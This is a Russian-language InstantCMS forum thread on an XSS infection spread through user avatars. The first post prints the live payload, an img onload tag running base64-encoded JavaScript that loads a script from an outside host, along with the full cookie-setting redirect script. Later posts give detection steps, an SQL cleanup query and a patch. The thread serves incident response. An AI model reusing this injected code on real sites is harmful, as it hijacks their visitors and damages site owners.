Обнаружен вирус на некоторых сайтах instantcms!

Проверьте свои сайты!

1
2
3
4
Следующая
Показаны 1-15 из 50

#1 6 декабря 2017 в 14:45

Уже насчитал больше 5 зараженных сайтов

Вирус делает перенаправление на левый сайт людей пришедших к вам из поисковиков

История с первым обнаружением и чем опасен вирус для самого сайта
тут — instantcms.ru/forum/thread28582-1.html

Подробности работы вируса:

К аватарке юзера прицеплен код

Спойлер

<img src="/upload/003/u364/a3/03/dfb0d8e4.jpg" onload="eval(atob('dmFyIG49ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7bi5zcmM9Ii8vY29tbC5iZS9pYyI7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoImJvZHkiKVswXS5hcHBlbmRDaGlsZChuKTs='))" 
width="32" height="32" alt="Елена Кучукова" title="Елена Кучукова" />
</a>

Имя может быть любым

Который добавляет в тело подгрузку еще одного скрипта с адреса coml.be

Спойлер

var n=document.createElement("script");
n.src="//coml.be/ic";
document.getElementsByTagName("body")[0].appendChild(n);

Скрипт coml.be проверяет/ставит свои куки, смотрит с поисковика ли и делает редирект на левый сайт

Спойлер

var rref5877=document.referrer, rt5877=GetCookie5877('r5877'), ExpDate=new Date();if(parent.window.opener && (rref5877.indexOf('google')+1 || rref5877.indexOf('nova.rambler')+1)){if(rt5877==null){parent.window.opener.location.replace("http://ruinfoblog.com/out/?eUwaYQNoJENT");}} else if(rref5877.indexOf('google')+1 || rref5877.indexOf('yandex')+1 || rref5877.indexOf('go.mail')+1 || rref5877.indexOf('nova.rambler')+1){if(rt5877==null){document.onclick = function(){window.open('http://ruinfoblog.com/out/?eUwaYQNoJENT');document.onclick = null;};}} rref5877=unescape(rref5877);ExpDate.setTime(ExpDate.getTime()+(24*60*60*1000*30));SetCookie5877('r5877', '1', ExpDate, "/");function GetCookie5877Val(offset){var endstr=document.cookie.indexOf(";", offset);if(endstr==-1)endstr=document.cookie.length;return unescape(document.cookie.substring(offset, endstr));}function GetCookie5877(name){var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;while(i<clen){var j=i+alen;if(document.cookie.substring(i, j)==arg) return GetCookie5877Val(j);i=document.cookie.indexOf(" ", i)+1;if(i == 0) break;}return null;}function SetCookie5877(name, value){var argv=SetCookie5877.arguments;var argc=SetCookie5877.arguments.length;var expires=(argc>2)?argv[2]:null;var path=(argc>3)?argv[3]:null;var domain=(argc>4)?argv[4]:null;var secure=(argc>5)?argv[5]:false;document.cookie=name+"="+escape(value)+((expires==null)?"":("; expires="+expires.toGMTString()))+((path==null)?"":("; path="+path))+((domain==null)?"":("; domain="+domain))+((secure==true)?"; secure":"");}

Проверьте свои сайты!

Как проверить?

Зайдите на свой сайт и посмотрите куки
если есть r5877 значит вирус есть

Как быстро удалить?

Посмотрите юзеров зарегистрировавшихся за последние 2-3 недели
ищите аватарку женщины на черном фоне, и удалите юзера.

Спойлер

Вы видели эту женщину?

Полечиться можно вот таким запросом, выполнив его в phpmyadmin
 
UPDATE `cms_users` SET `avatar`= NULL WHERE  `avatar` LIKE  '%onload%'
Fuze

Как обезопасить себя?

Читать внимательно пост Fuze — instantcms.ru/forum/thread28589-1.html#276383

#2 6 декабря 2017 в 14:59

Мне пока не известно через уязвимость в каком компоненте добавлен код,
Sonat

А взлом не рассматривали?

#3 6 декабря 2017 в 15:03

а то я смотрю, на одном из моих проектов стали редиректы сыпаться…
проверю сейчас, спасибо

Сегодня в 07:25

#4 6 декабря 2017 в 15:06

Какой хостинг сразу пишите, может это у кого до уязвимость

#5 6 декабря 2017 в 15:07

А взлом не рассматривали?
Jestik

Не понял вопрос. scratch

Ну, да, это взлом, через уязвимость какого-то компонента или движка (что маловероятно).

Какой хостинг сразу пишите, может это у кого до уязвимость
Jestik

Разные сайты на разных хостингах — объединяет их то что они на instantcms

#6 6 декабря 2017 в 15:26

Sonat

В Вашем сообщении #1 отсутствует верхняя строка и есть только завершающий тег ссылки.
В сообщении #14 Сегодня в 14:27 здесь правильно, там два тега.

#7 6 декабря 2017 в 15:46

Есть xss, да.
1. Отсюда возьмите файлы image.php и images.php и замените их у себя.
2. В файле /system/libs/html.helper.php замените аналогичные строки вот так и вот так

Основной дистрибутив версии 2.8.2 и пакет обновления обновлены.

Для любых версий ниже 2.8.2 можно выполнить только второй пункт. Зловредный код пройдёт, но не будет работать.

Полечиться можно вот таким запросом, выполнив его в phpmyadmin

UPDATE `cms_users` SET `avatar`= NULL WHERE  `avatar` LIKE  '%onload%'

где cms_users — ваша таблица юзеров, avatar — системное имя поля с аватаром. Аналогично можно проделать с другими таблицами, где есть поля изображений и юзеры могут добавлять записи.

UPDATE `НАЗВАНИЕ_ТАБЛИЦЫ` SET `СИСТЕМНОЕ_ИМЯ_ПОЛЯ_ИЗОБРАЖЕНИЯ`= NULL WHERE  `СИСТЕМНОЕ_ИМЯ_ПОЛЯ_ИЗОБРАЖЕНИЯ` LIKE  '%onload%'

P.S. ну и конечно это не вирус, обычная xss

🛠 docs.instantcms.ru

#8 6 декабря 2017 в 17:51

Fuze, Спасибо!

Рекомендуется ли всем обновиться?

#9 6 декабря 2017 в 17:57

Кстати, как я почта была у этого аккаунта с женщиной? Везде разная?

#10 6 декабря 2017 в 18:02

Jestik, Не знаю, почта же крыта у всех, сайты не мои, доступа в админку нет.

#11 6 декабря 2017 в 18:45

Кстати, как я почта была у этого аккаунта с женщиной? Везде разная?

Jestik

На моем selena.kuchukova@ mail.ru

Автору топика и Fuze премного благодарностей за решение проблемы! Пошел латать дырки))

#12 6 декабря 2017 в 20:14

У себя нашел именно с таким аватаром

Спасибо за информацию!!

Бегу изгонять дьявола

#13 6 декабря 2017 в 20:35

В файле /system/libs/html.helper.php замените аналогичные строки вот так и вот так

Fuze

~~У меня отличаются данные файлы. версия 2,8,2~~

~~Подскажите ориентировочно в какой строке изменить?~~

Заменил файлы взяв их из дистрибутива

#14 7 марта 2018 в 20:33

В продолжение темы — два дня назад упал трафик на еще одном сайте на ICMS2 — cf-team.ru
Первым делом пошел проверять редирект — теперь не родительская страница, а открывается отдельное окно.
В куках висит подозрительная хренотень: r6479 — видимо такая же, как из прошлой ситуации.
Что проверил:
Подозрительных пользователей с аватарками нет;
Выполнил поиск не только по полю аватар, но и по всей базе рекомендовано Fuze;
Прошлое лекарство с учетом версии (у меня 2.7.2) было добавлено еще в прошлый раз.
Что думаете, господа? Где-то еще дырка или какой-то сторонний компонент шалит?
Вот на этом сайте, увы, всякого добра вагон — и форум, и куча мелких модулей. Но нового ничего не добавлялось уже больше 7 месяцев.

#15 7 марта 2018 в 22:42

Очередной раз почитал тему про вирусы на сайте и полез смотреть куки в браузере.
То что увидел сильно удивило и одновременно насторожило, так как кроме объяснимых куков есть совершенно непонятно откуда взявшиеся.
Вот список

Спойлер

Это на одном сайте, на другом чуть меньше и на том что практически не работает только первый кук без имени.
Кто что подскажет? Что это за "гости", стоит ли их опасаться и как выпроводить?

По рефке 10% скидка на мощный и гибкий хостинг на NVMе дисках! Дешевые домены здесь! Чат-боты для любых соцсетей

1
2
3
4
Следующая
Показаны 1-15 из 50

Редирект родительской страницы

НА сервере поселился вирус и м

Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.

Обнаружен вирус на некоторых сайтах instantcms!

Проверьте свои сайты!

Как проверить?

Как быстро удалить?

Как обезопасить себя?

Похожие темы

[ЕСТЬ РЕШЕНИЕ] Непонятная проблема сайта с некоторых устройств. (1 ветка!)

[ЗАКРЫТО] Отображение полей в фильтрах

Обнаружен Backdoor:PHP/Dirtelti.MTF в виджете PHP

[Antivirus] Обнаружены угрозы (2 шт.)

Я все больше убеджаюсь, что некоторые конторы...

[ЕСТЬ РЕШЕНИЕ] Удаляют файлы сайта или заражают их

InstantCMS Team

О проекте

Поддержка

Дополнения